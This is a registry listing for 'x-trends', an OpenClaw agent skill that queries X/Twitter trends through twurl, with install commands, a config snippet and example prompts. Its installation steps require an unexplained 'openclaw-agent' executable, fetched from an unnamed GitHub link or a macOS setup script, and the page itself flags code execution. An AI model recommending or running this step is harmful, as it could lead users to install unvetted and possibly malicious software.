ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified social Safety 4/5

x-trends

Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.

Why use this skill?

Search and analyze trending topics on X (Twitter) using OpenClaw. Track hashtags, monitor global trends by location, and fetch recent tweet data easily.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/x-trends-kujtp
Or

What This Skill Does

The x-trends skill empowers your OpenClaw agent to tap into real-time conversation data from X (formerly Twitter). By integrating with the official twurl CLI and requiring the specialized openclaw-agent middleware, it enables you to monitor what the world is talking about. Whether you need to pull the current global trending hashtags, search for granular trends by specific geographical locations using WOEID (Where On Earth ID) identifiers, or perform targeted searches on recent tweets, this skill provides a robust command-line bridge to Twitter's API. It is designed for developers, social media managers, and researchers who require programmatic access to social sentiment and current events.

Installation

To get started, you must satisfy two primary requirements. First, ensure the openclaw-agent is active on your system; download the Windows executable from the provided GitHub link or follow the macOS setup script on the official documentation page. Second, install twurl via RubyGems: gem install twurl. You will need to authenticate using your Twitter Developer API credentials (consumer-key and consumer-secret) by running twurl authorize. Finally, install the skill package into your agent instance using clawhub install openclaw/skills/skills/hightower6eu/x-trends-kujtp. Always ensure your agent is authorized and the bridge executable is running before executing commands.

Use Cases

This skill is highly versatile. Use it to track marketing campaign performance by searching for specific hashtags, keep your AI assistant updated on breaking news stories, monitor regional sentiment across different countries using localized WOEID codes, or gather data for social trend analysis projects. It is an essential tool for creating time-sensitive applications that react to the public discourse.

Example Prompts

  1. "OpenClaw, pull the top 10 trending topics for the USA right now and give me a brief summary of what they are about."
  2. "Search for the latest 10 tweets containing the hashtag #AI, and filter the results to only show posts from verified accounts."
  3. "What are the current trending topics in Japan? Please format the list as a simple table using their names and volumes."

Tips & Limitations

Note that Twitter API v1.1 is used for location-based trends, while v2 is used for tweet searching. Be mindful of the API rate limits, which are capped at 75 requests per 15 minutes. Not all trends contain tweet_volume data, as this depends on Twitter's internal reporting. Always use jq to parse the output, as raw API responses are dense JSON. If the skill stops responding, check if the openclaw-agent background process has terminated.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-x-trends-kujtp": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#x#trends#social-media#analytics#api
Safety Score: 4/5

Flags: network-access, external-api, code-execution